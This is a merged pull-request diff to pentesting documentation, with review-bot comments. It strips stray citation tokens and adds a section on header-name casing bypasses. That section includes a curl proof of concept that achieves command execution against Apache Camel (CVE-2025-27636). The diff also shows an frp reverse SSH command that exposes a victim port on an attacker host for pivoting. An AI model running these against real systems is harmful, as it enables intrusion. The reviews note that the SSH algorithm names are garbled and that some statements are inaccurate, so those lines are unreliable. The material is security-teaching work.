CVE-2025-27636 – Remote Code Execution in Apache Camel via C... #1093

Merged
7 changes: 3 additions & 4 deletions src/generic-hacking/tunneling-and-port-forwarding.md
@@ -107,7 +107,7 @@ route add -net 10.0.0.0/16 gw 1.1.1.1

> [!NOTE]
> **Security – Terrapin Attack (CVE-2023-48795)**
> The 2023 Terrapin downgrade attack can let a man-in-the-middle tamper with the early SSH handshake and inject data into **any forwarded channel** ( `-L`, `-R`, `-D` ). Ensure both client and server are patched (**OpenSSH ≥ 9.6/LibreSSH 6.7**) or explicitly disable the vulnerable `[email protected]` and `*[email protected]` algorithms in `sshd_config`/`ssh_config` before relying on SSH tunnels. citeturn4search0
> The 2023 Terrapin downgrade attack can let a man-in-the-middle tamper with the early SSH handshake and inject data into **any forwarded channel** ( `-L`, `-R`, `-D` ). Ensure both client and server are patched (**OpenSSH ≥ 9.6/LibreSSH 6.7**) or explicitly disable the vulnerable `[email protected]` and `*[email protected]` algorithms in `sshd_config`/`ssh_config` before relying on SSH tunnels.

## SSHUTTLE

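Review bot: dropping the stray `citeturn4search0` token is correct, but the kept line still has two defects that should go in the same edit: the algorithm names render as `[email protected]` and `*[email protected]`, which are not valid SSH algorithm identifiers (they look like an e-mail obfuscation artefact), and `LibreSSH 6.7` reads like a typo of the intended implementation name. Verify the literal algorithm names and the product name against the CVE-2023-48795 advisory the note points to, since a reader following this advice has to paste those identifiers into `sshd_config`/`ssh_config`.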
@@ -686,7 +686,7 @@ Start the connector:
cloudflared tunnel run mytunnel
```

Because all traffic leaves the host **outbound over 443**, Cloudflared tunnels are a simple way to bypass ingress ACLs or NAT boundaries. Be aware that the binary usually runs with elevated privileges – use containers or the `--user` flag when possible. citeturn1search0
Because all traffic leaves the host **outbound over 443**, Cloudflared tunnels are a simple way to bypass ingress ACLs or NAT boundaries. Be aware that the binary usually runs with elevated privileges – use containers or the `--user` flag when possible.

## FRP (Fast Reverse Proxy)

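Review bot: removing `citeturn1search0` leaves the privilege claim ("usually runs with elevated privileges") and the `--user` flag in this sentence with no source at all. The Django file touched by this same PR keeps a `## References` section; add the cloudflared documentation entry there or link it inline, otherwise a reader cannot check whether `--user` applies to `cloudflared tunnel run` as written.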
@@ -724,7 +724,7 @@ sshTunnelGateway.bindPort = 2200 # add to frps.toml
ssh -R :80:127.0.0.1:8080 v0@attacker_ip -p 2200 tcp --proxy_name web --remote_port 9000
```

The above command publishes the victim’s port **8080** as **attacker_ip:9000** without deploying any additional tooling – ideal for living-off-the-land pivoting. citeturn2search1
The above command publishes the victim’s port **8080** as **attacker_ip:9000** without deploying any additional tooling – ideal for living-off-the-land pivoting.

## Other tools to check

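Review bot: the rewritten sentence says port 8080 is published as `attacker_ip:9000`, but the command above it contains two candidate ports on the remote side (`-R :80:` and `--remote_port 9000`); state explicitly which one is the listener that is actually exposed and what `:80` in the `-R` spec does, otherwise readers will copy the line without knowing which port to use. The trailing `tcp --proxy_name web --remote_port 9000` arguments and the `v0@attacker_ip` user are frp-specific syntax parsed by the SSH tunnel gateway configured with `sshTunnelGateway.bindPort = 2200` in the hunk header; one comment line saying so would make the example self-explanatory.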
@@ -734,4 +734,3 @@ The above command publishes the victim’s port **8080** as **attacker_ip:9000**
{{#include ../banners/hacktricks-training.md}}



8 changes: 4 additions & 4 deletions src/network-services-pentesting/pentesting-web/django.md
@@ -65,15 +65,15 @@ Send the resulting cookie, and the payload runs with the permissions of the WSGI
---

## Recent (2023-2025) High-Impact Django CVEs Pentesters Should Check
* **CVE-2025-48432** – *Log Injection via unescaped `request.path`* (fixed June 4 2025). Allows attackers to smuggle newlines/ANSI codes into log files and poison downstream log analysis. Patch level ≥ 4.2.22 / 5.1.10 / 5.2.2. citeturn0search0
* **CVE-2024-42005** – *Critical SQL injection* in `QuerySet.values()/values_list()` on `JSONField` (CVSS 9.8). Craft JSON keys to break out of quoting and execute arbitrary SQL. Fixed in 4.2.15 / 5.0.8. citeturn1search2
* **CVE-2025-48432** – *Log Injection via unescaped `request.path`* (fixed June 4 2025). Allows attackers to smuggle newlines/ANSI codes into log files and poison downstream log analysis. Patch level ≥ 4.2.22 / 5.1.10 / 5.2.2.
* **CVE-2024-42005** – *Critical SQL injection* in `QuerySet.values()/values_list()` on `JSONField` (CVSS 9.8). Craft JSON keys to break out of quoting and execute arbitrary SQL. Fixed in 4.2.15 / 5.0.8.

Always fingerprint the exact framework version via the `X-Frame-Options` error page or `/static/admin/css/base.css` hash and test the above where applicable.

---

## References
* Django security release – "Django 5.2.2, 5.1.10, 4.2.22 address CVE-2025-48432" – 4 Jun 2025. citeturn0search0
* OP-Innovate: "Django releases security updates to address SQL injection flaw CVE-2024-42005" – 11 Aug 2024. citeturn1search2
* Django security release – "Django 5.2.2, 5.1.10, 4.2.22 address CVE-2025-48432" – 4 Jun 2025.
* OP-Innovate: "Django releases security updates to address SQL injection flaw CVE-2024-42005" – 11 Aug 2024.

{{#include /banners/hacktricks-training.md}}
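Review bot: with the citation tokens removed from the two CVE bullets, the References list is now their only provenance, and it is uneven: CVE-2025-48432 cites the Django security release, while CVE-2024-42005, the bullet with the stronger claims (CVSS 9.8, "execute arbitrary SQL"), cites only a third-party write-up (OP-Innovate). Cite the Django 4.2.15 / 5.0.8 security release for that bullet as well, and consider linking each bullet to its reference inline so the bullets and the list cannot drift apart in later edits.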
@@ -193,8 +193,46 @@ Lastly, HSTS is a security feature that forces browsers to communicate with serv
Strict-Transport-Security: max-age=3153600
```

## Header Name Casing Bypass

HTTP/1.1 defines header field‐names as **case-insensitive** (RFC 9110 §5.1). Nevertheless, it is very common to find custom middleware, security filters, or business logic that compare the *literal* header name received without normalising the casing first (e.g. `header.equals("CamelExecCommandExecutable")`). If those checks are performed **case-sensitively**, an attacker may bypass them simply by sending the same header with a different capitalisation.

Typical situations where this mistake appears:

* Custom allow/deny lists that try to block “dangerous” internal headers before the request reaches a sensitive component.
* In-house implementations of reverse-proxy pseudo-headers (e.g. `X-Forwarded-For` sanitisation).
* Frameworks that expose management / debug endpoints and rely on header names for authentication or command selection.

### Abusing the bypass

1. Identify a header that is filtered or validated server-side (for example, by reading source code, documentation, or error messages).
2. Send the **same header with a different casing** (mixed-case or upper-case). Because HTTP stacks usually canonicalise headers only *after* user code has run, the vulnerable check can be skipped.
3. If the downstream component treats headers in a case-insensitive way (most do), it will accept the attacker-controlled value.

### Example: Apache Camel `exec` RCE (CVE-2025-27636)

In vulnerable versions of Apache Camel the *Command Center* routes try to block untrusted requests by stripping the headers `CamelExecCommandExecutable` and `CamelExecCommandArgs`. The comparison was done with `equals()` so only the exact lowercase names were removed.

```bash
# Bypass the filter by using mixed-case header names and execute `ls /` on the host
curl "http://<IP>/command-center" \
-H "CAmelExecCommandExecutable: ls" \
-H "CAmelExecCommandArgs: /"
```

The headers reach the `exec` component unfiltered, resulting in remote command execution with the privileges of the Camel process.

### Detection & Mitigation

* Normalise all header names to a single case (usually lowercase) **before** performing allow/deny comparisons.
* Reject suspicious duplicates: if both `Header:` and `HeAdEr:` are present, treat it as an anomaly.
* Use a positive allow-list enforced **after** canonicalisation.
* Protect management endpoints with authentication and network segmentation.


## References

- [CVE-2025-27636 – RCE in Apache Camel via header casing bypass (OffSec blog)](https://www.offsec.com/blog/cve-2025-27636/)
- [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Disposition](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Disposition)
- [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers)
- [https://web.dev/security-headers/](https://web.dev/security-headers/)
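Review bot: the new section contradicts itself about what the vulnerable comparison matched. The `### Example` paragraph says "only the exact lowercase names were removed", but the names it quotes (`CamelExecCommandExecutable`, `CamelExecCommandArgs`) are mixed-case, and the curl example bypasses the filter by changing the case of a single letter (`CAmelExec...`); say "exact-case names" so the description and the example agree. Two smaller points: the sentence "HTTP stacks usually canonicalise headers only *after* user code has run" is asserted without support and is not needed for the argument (the filter compares the raw name it received, which is the point), so soften or drop it; and the Detection & Mitigation bullets should state the actual fix for the `header.equals("...")` pattern shown in the first paragraph, namely a case-insensitive comparison (for example `equalsIgnoreCase`) or comparing against the lowercased name, since that is what "normalise before comparing" means in code. Also remove the doubled blank line before `## References`.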